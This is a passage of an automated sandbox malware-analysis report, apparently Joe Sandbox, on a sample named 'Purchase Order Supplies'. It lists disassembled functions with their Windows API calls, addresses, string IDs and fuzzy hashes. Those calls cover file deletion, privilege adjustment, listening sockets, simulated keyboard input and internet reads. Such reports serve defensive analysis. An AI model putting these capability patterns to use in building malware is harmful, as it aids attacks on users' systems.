                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                          • String ID: $default$winsta0
                          • API String ID: 2063423040-1027155976
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75728FB0,?,00000000), ref: 00CE2065
                          • _wcscmp.LIBCMT ref: 00CE207A
                          • _wcscmp.LIBCMT ref: 00CE2091
                          • GetFileAttributesW.KERNEL32(?), ref: 00CE20A3
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00CE20BD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE20D5
                          • FindClose.KERNEL32(00000000), ref: 00CE20E0
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE20FC
                          • _wcscmp.LIBCMT ref: 00CE2123
                          • _wcscmp.LIBCMT ref: 00CE213A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE214C
                          • SetCurrentDirectoryW.KERNEL32(00D43A68), ref: 00CE216A
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE2174
                          • FindClose.KERNEL32(00000000), ref: 00CE2181
                          • FindClose.KERNEL32(00000000), ref: 00CE2191
                          Strings
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • DragQueryPoint.SHELL32(?,?), ref: 00CFF14B
                            • Part of subcall function 00CFD5EE: ClientToScreen.USER32(?,?), ref: 00CFD617
                            • Part of subcall function 00CFD5EE: GetWindowRect.USER32(?,?), ref: 00CFD68D
                            • Part of subcall function 00CFD5EE: PtInRect.USER32(?,?,00CFEB2C), ref: 00CFD69D
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF1B4
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFF1BF
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFF1E2
                          • _wcscat.LIBCMT ref: 00CFF212
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFF229
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF242
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF259
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF27B
                          • DragFinish.SHELL32(?), ref: 00CFF282
                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00CFF36D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 2166380349-3440237614
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75728FB0,?,00000000), ref: 00CE21C0
                          • _wcscmp.LIBCMT ref: 00CE21D5
                          • _wcscmp.LIBCMT ref: 00CE21EC
                            • Part of subcall function 00CD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD7621
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE221B
                          • FindClose.KERNEL32(00000000), ref: 00CE2226
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE2242
                          • _wcscmp.LIBCMT ref: 00CE2269
                          • _wcscmp.LIBCMT ref: 00CE2280
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE2292
                          • SetCurrentDirectoryW.KERNEL32(00D43A68), ref: 00CE22B0
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE22BA
                          • FindClose.KERNEL32(00000000), ref: 00CE22C7
                          • FindClose.KERNEL32(00000000), ref: 00CE22D7
                          Strings
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          APIs
                          Strings
                          Similarity
                          • API ID: _memmove_memset
                          • String ID: Q\E$[$\$\$\$]$^
                          • API String ID: 3555123492-286096704
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFED0C
                          • GetFocus.USER32 ref: 00CFED1C
                          • GetDlgCtrlID.USER32(00000000), ref: 00CFED27
                          • _memset.LIBCMT ref: 00CFEE52
                          • GetMenuItemInfoW.USER32 ref: 00CFEE7D
                          • GetMenuItemCount.USER32(00000000), ref: 00CFEE9D
                          • GetMenuItemID.USER32(?,00000000), ref: 00CFEEB0
                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CFEEE4
                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CFEF2C
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFEF64
                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00CFEF99
                          Strings
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                          • String ID: 0
                          • API String ID: 3616455698-4108050209
                          APIs
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                            • Part of subcall function 00CCB8E7: GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                            • Part of subcall function 00CCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                            • Part of subcall function 00CCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                            • Part of subcall function 00CCB982: GetProcessHeap.KERNEL32(00000008,00CCB3E1,00000000,00000000,?,00CCB3E1,?), ref: 00CCB98E
                            • Part of subcall function 00CCB982: RtlAllocateHeap.NTDLL(00000000,?,00CCB3E1), ref: 00CCB995
                            • Part of subcall function 00CCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCB3E1,?), ref: 00CCB9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCB3FC
                          • _memset.LIBCMT ref: 00CCB411
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCB430
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB441
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCB47E
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCB49A
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB4B7
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCB4C6
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CCB4CD
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCB4EE
                          • CopySid.ADVAPI32(00000000), ref: 00CCB4F5
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCB526
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCB54C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCB560
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00CD7C0C: GetFileAttributesW.KERNEL32(?,00CD6A7B), ref: 00CD7C0D
                          • _wcscat.LIBCMT ref: 00CD6E7E
                          • __wsplitpath.LIBCMT ref: 00CD6E99
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6EAE
                          • _wcscpy.LIBCMT ref: 00CD6EDD
                          • _wcscat.LIBCMT ref: 00CD6EEF
                          • _wcscat.LIBCMT ref: 00CD6F01
                          • DeleteFileW.KERNEL32(?), ref: 00CD6F0E
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD6F22
                          • FindClose.KERNEL32(00000000), ref: 00CD6F3D
                          Strings
                          Similarity
                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                          • String ID: \*.*
                          • API String ID: 2643075503-1173974218
                          APIs
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          APIs
                            • Part of subcall function 00CCA857: CLSIDFromProgID.COMBASE ref: 00CCA874
                            • Part of subcall function 00CCA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00CCA88F
                            • Part of subcall function 00CCA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00CCA89D
                            • Part of subcall function 00CCA857: CoTaskMemFree.COMBASE(00000000), ref: 00CCA8AD
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00CEC6AD
                          • _memset.LIBCMT ref: 00CEC6BA
                          • _memset.LIBCMT ref: 00CEC7D8
                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00CEC804
                          • CoTaskMemFree.COMBASE(?), ref: 00CEC80F
                          Strings
                          • NULL Pointer assignment, xrefs: 00CEC85D
                          Similarity
                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1300414916-2785691316
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CE24F6
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CE2526
                          • _wcscmp.LIBCMT ref: 00CE253A
                          • _wcscmp.LIBCMT ref: 00CE2555
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CE25F3
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CE2609
                          Strings
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                          • String ID: *.*
                          • API String ID: 713712311-438819550
                          Strings
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • ReleaseCapture.USER32 ref: 00CFEB1A
                          • SetWindowTextW.USER32(?,00000000), ref: 00CFEBC2
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CFEBD5
                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CFECAE
                          Strings
                          Similarity
                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                          • API String ID: 973565025-2107944366
                          APIs
                            • Part of subcall function 00CCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCBF0F
                            • Part of subcall function 00CCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCBF3C
                            • Part of subcall function 00CCBEC3: GetLastError.KERNEL32 ref: 00CCBF49
                          • ExitWindowsEx.USER32(?,00000000), ref: 00CD830C
                          Strings
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006), ref: 00CE9235
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9244
                          • bind.WS2_32(00000000,?,00000010), ref: 00CE9260
                          • listen.WS2_32(00000000,00000005), ref: 00CE926F
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9289
                          • closesocket.WS2_32(00000000), ref: 00CE929D
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _memmove.LIBCMT ref: 00D03020
                          • _memmove.LIBCMT ref: 00D03135
                          • _memmove.LIBCMT ref: 00D031DC
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID:
                          • API String ID: 1300846289-0
                          APIs
                            • Part of subcall function 00CEACD3: inet_addr.WS2_32(00000000), ref: 00CEACF5
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00CE973D
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00CE9760
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDF37A
                          • _wcscmp.LIBCMT ref: 00CDF3AA
                          • _wcscmp.LIBCMT ref: 00CDF3BF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF3D0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CDF3FE
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CF20EC,?,00CF22E0), ref: 00CF2104
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CF2116
                          Strings
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD439C
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD43B8
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CD4425
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CD4483
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • GetCursorPos.USER32(?), ref: 00CFEFE2
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0F3C3,?,?,?,?,?), ref: 00CFEFF7
                          • GetCursorPos.USER32(?), ref: 00CFF041
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0F3C3,?,?,?), ref: 00CFF077
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CD221E
                          Strings
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00CAAE5E
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CE4A1E,00000000), ref: 00CE55FD
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE5629
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDEA95
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDEAEF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDEB3C
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD70D8
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CD7115
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD711E
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • GetParent.USER32(?), ref: 00D0F4B5
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00CAADDD,?,?,?,00000006,?), ref: 00D0F52F
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00D0F352,?,?,?), ref: 00CFF115
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFF0FB
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          • Opcode ID: a043ccf454e765c37f0e6c70bad6073a29c1c2ae317891d3249fad5828924c46
                          • Instruction ID: 1d44707370abb10078356135fa9c13b9837412cf3d7157435dd960f2647b9170
                          • Opcode Fuzzy Hash: a043ccf454e765c37f0e6c70bad6073a29c1c2ae317891d3249fad5828924c46
                          • Instruction Fuzzy Hash: 89019231200208FBDB219F14DC45F6A3F66FF86364F148528FA154B3A1CB319803EB62
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00CFF47D
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00D0F42E,?,?,?,?,?), ref: 00CFF4A6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          • Opcode ID: 623893afcf22a30f4d8c9f192806655f1775aef8607359bf8973919201a0243c
                          • Instruction ID: 046dfb085689a0b0ad44c3d8bb80cad775598c76efd0aea48dd9782516367491
                          • Opcode Fuzzy Hash: 623893afcf22a30f4d8c9f192806655f1775aef8607359bf8973919201a0243c
                          • Instruction Fuzzy Hash: 1FF01D76400218BFEB049F55DC059EE7FB9FF44351F10401AF901A2160D775AA51DB70
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CEC2E2,?,?,00000000,?), ref: 00CDD73F
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CEC2E2,?,?,00000000,?), ref: 00CDD751
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 788ca88fbea3994c74cbcd8349eae23aa7680332bb5b1cfd91217240f436378c
                          • Instruction ID: 72e358b9cc412eab87e34958fdbfe339d05c036a8795e1c2fc5df6d8af9f647c
                          • Opcode Fuzzy Hash: 788ca88fbea3994c74cbcd8349eae23aa7680332bb5b1cfd91217240f436378c
                          • Instruction Fuzzy Hash: DEF0823550032DBBDB11AFA4CC49FEA776DAF49351F008155F916D6281D7309A40DBA0
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CD4B89
                          • keybd_event.USER32(?,7697C0D0,?,00000000), ref: 00CD4B9C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: a201ec342eb27275ce6b92f2d27010d4be09463d87580ad5800a0da83a221002
                          • Instruction ID: 550b6ab332385030f69a12ed7b2f1087eb136700b47617b45d54639cc58de41d
                          • Opcode Fuzzy Hash: a201ec342eb27275ce6b92f2d27010d4be09463d87580ad5800a0da83a221002
                          • Instruction Fuzzy Hash: 91F01D7090434DAFEB058FA5C805BBE7BB5AF04305F04C40AFA65A5291D779C6169FA4
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCB9EC), ref: 00CCB8C5
                          • CloseHandle.KERNEL32(?,?,00CCB9EC), ref: 00CCB8D7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 0be79d214808a39c68df7328ada022b04fb3559803d06ceebfdd0e3c1b5d3e76
                          • Instruction ID: bb507b194f942ccd4304cc6601719443fc39043c7db84db2b47efaae1cc81832
                          • Opcode Fuzzy Hash: 0be79d214808a39c68df7328ada022b04fb3559803d06ceebfdd0e3c1b5d3e76
                          • Instruction Fuzzy Hash: E7E0B672004611BEE7262B64EC09DB77BEAEF08311B20C869F49681470DB62ACD1EB20
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00CFF59C
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00D0F3AD,?,?,?,?), ref: 00CFF5C6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 2dd9c8667dd33a78a6162e4caec39b0a80098e30992eac086cce932e4a346a56
                          • Instruction ID: daa810ce440980d86c075a6caa5d647497244b632677d40fe466f1fa80ba3ccf
                          • Opcode Fuzzy Hash: 2dd9c8667dd33a78a6162e4caec39b0a80098e30992eac086cce932e4a346a56
                          • Instruction Fuzzy Hash: CBE0867010422CBBEB141F19DC19FB93B15EB00750F10851AF916C80E1D7B08591D660
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00C9125D,00CB7A43,00C90F35,?,?,00000001), ref: 00CB8E41
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CB8E4A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
